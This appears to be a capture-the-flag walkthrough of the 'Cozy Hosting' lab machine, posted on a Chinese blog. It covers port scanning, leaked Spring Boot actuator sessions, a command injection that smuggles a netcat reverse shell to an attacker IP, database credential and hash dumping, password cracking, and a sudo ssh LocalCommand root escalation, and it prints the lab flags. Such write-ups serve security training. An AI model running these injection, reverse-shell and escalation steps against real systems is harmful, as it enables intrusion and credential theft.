Cozy Cloud RCE

0 18
Information GatheringIP AddressOpening Ports10.10.11.230TCP:22,80$ ip='10.10.11....

Information Gathering

IP AddressOpening Ports
10.10.11.230TCP:22,80

$ ip='10.10.11.230'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_  256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Spring Boot API sessions leak

# echo "10.10.11.230 cozyhosting.htb">>/etc/hosts

Cozy Cloud RCE

http://cozyhosting.htb/

image-1.png

$ feroxbuster -u 'http://cozyhosting.htb/' -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt

image-2.png

image-3.png

$ curl http://cozyhosting.htb/actuator/mappings|jq

image-4.png

$ curl http://cozyhosting.htb/actuator/sessions|jq

image-5.png

image-6.png

Cozy Cloud RCE

image-7.png

POST /executessh HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://cozyhosting.htb
Connection: close
Referer: http://cozyhosting.htb/admin
Cookie: JSESSIONID=E2D6FD319BB33F0C82C7A5BDB7B5BB9E
Upgrade-Insecure-Requests: 1

host=127.0.0.1&username=1;ping -c 1 10.10.16.28

image-8.png

host=127.0.0.1&username=1;nc+10.10.16.28+443+-e+/bin/bash

image-10.png

Lateral Movement Via PostgreSQL

app@cozyhosting:/app$ unzip cloudhosting-0.0.1.jar -d /tmp/

app@cozyhosting:/tmp$ grep -grep -iR password

image-11.png

image-12.png

username=postgres
password=Vg&nvzAQ7XxR;

$ psql -h 127.0.0.1 -U postgres

postgres=# \connect cozyhosting

cozyhosting=# \dt

image-13.png

cozyhosting=# select * from users;

image-14.png

kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

$ hashcat.exe hashes.txt --wordlist=https://www.freebuf.com/articles/es/rockyou.txt -m 3200

image-16.png

manchesterunited

image-17.png

User.txt

cc93083b7bccc1a1317a42e90f1fbcc2

Privilege Escalation:SSH Abuse

image-18.png

$ sudo /usr/bin/ssh -v -o PermitLocalCommand=yes -o 'LocalCommand=/bin/bash' josh@127.0.0.1

image-19.png

Root.txt

db965b14ba2e4959c7ef2d0f135e0d0e

你可能想看:
最后修改时间:
admin
上一篇 2025年03月28日 03:14
下一篇 2025年03月28日 03:37

评论已关闭